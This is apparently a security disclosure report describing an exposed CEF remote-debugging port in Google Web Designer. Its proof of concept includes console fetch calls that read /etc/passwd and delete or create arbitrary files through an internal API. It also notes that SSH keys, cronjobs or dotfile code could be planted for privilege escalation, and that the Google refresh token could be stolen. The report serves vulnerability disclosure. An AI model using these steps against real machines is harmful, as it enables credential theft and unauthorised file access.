Summary: CEF Debugger Enabled in Google Web Designer

Product: Google Web Designer

Vulnerability type: Privilege Escalation

Details

Description

Google Web Designer is built compiled with the GEF debugger enabled. This configuration exposes a local TCP port which (which is typically randomized across executions) where a minimal frontend and a WebSocket server are available. By connecting to it, it is possible to run arbitrary JavaScript code inside the context of the target application (Google Web Designer). A general description of the vulnerability was very well documented by your very own Taviso here; https://github.com/taviso/cefdebug

Attack scenario

Attack Vector

As the GEF version is pretty recent and the /json/new API is not enabled and a DNS rebinding attack is not possible. The only working attack vector is the the local one. It means that the attacker must have a local shell on the victim's device as any user (this means it's very useful for privilege escalations).

Impact

An attacker could:

• Steal the Google account refresh token (if the victim is logged in the Google Web Designer client).
• Read / Write / Delete / List any file and folder the victim system user has access to. This is possible as Google Web Designer implements some special APIs which are triggered when you fetch a https://ninja-shell/api/{file|directory}?method={read|create|save|delete|exists|...}&{file|path}= URL.

Proof of Concept

Requirements:

1. Have a computer with 2 different system accounts (i.e. lowpriv and regularuser)

Steps to Reproduce:

1. Install the Google Web Designer client with regularuser
2. Open the Google Web Designer client with regularuser
3. Login with your Google Account
4. Open session as lowpriv without logging out from regularuser or closing the Google Web Designer client
5. List the running processes (i.e. by running ps auxw) and notice that the Google Web Designer is executed with the --remote-debugging-port flag, specifying a port (i.e. /Volumes/Google Web Designer/Google Web Designer.app/Contents/Frameworks/Google Web Designer Helper (Renderer).app/Contents/MacOS/Google Web Designer Helper (Renderer) --type=renderer --log-file=/Users/smaury/Library/Logs/Google Web Designer_debug.log --remote-debugging-port=65423 --field-trial-handle=1718379636,3111382051732477566,9981932134914610433,131072 --enable-features=CastMediaRouteProvider --lang=en --log-file=/Users/smaury/Library/Logs/Google Web Designer_debug.log --log-severity=disable --disable-spell-checking --uncaught-exception-stack-size=20 --num-raster-threads=4 --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --shared-files --seatbelt-client=44)
6. Open a browser pointing to http://localhost: where <port> is the one observed in the previous step
7. Click on "Google Web Designer"
8. In the Console tab paste the following code:

fetch("https://ninja-shell/api/file?method=read&file=%2Fetc%2fpasswd").then(response => response.text()).then(data => console.log(data));

9. Notice that the content of the file /etc/passwd is shown
10. In the Console tab paste the following code

fetch("https://ninja-shell/api/file?method=delete&file=%2Ftmp/test", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded;charset=UTF-8"
  },
  "referrer": "https://prodc.webdesignerauth.withgoogle.com/?livestream=0",
  "referrerPolicy": "no-referrer-when-downgrade",
  "body": "AAAA",
  "method": "PUT",
  "mode": "cors",
  "credentials": "omit"
});
fetch("https://ninja-shell/api/file?method=create&file=%2Ftmp/test", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded;charset=UTF-8"
  },
  "referrer": "https://prodc.webdesignerauth.withgoogle.com/?livestream=0",
  "referrerPolicy": "no-referrer-when-downgrade",
  "body": "AAAA",
  "method": "PUT",
  "mode": "cors",
  "credentials": "omit"
});

11. Notice that the file /tmp/test is deleted and then re-created with AAAA as content

The file creation/edit ability is very important as it could be used to elevate the privileges from lowpriv to regularuser by adding an SSH key or a cronjob or some code in the dotfiles (.bashrc, .bash_profile, etc.) file of regularuser.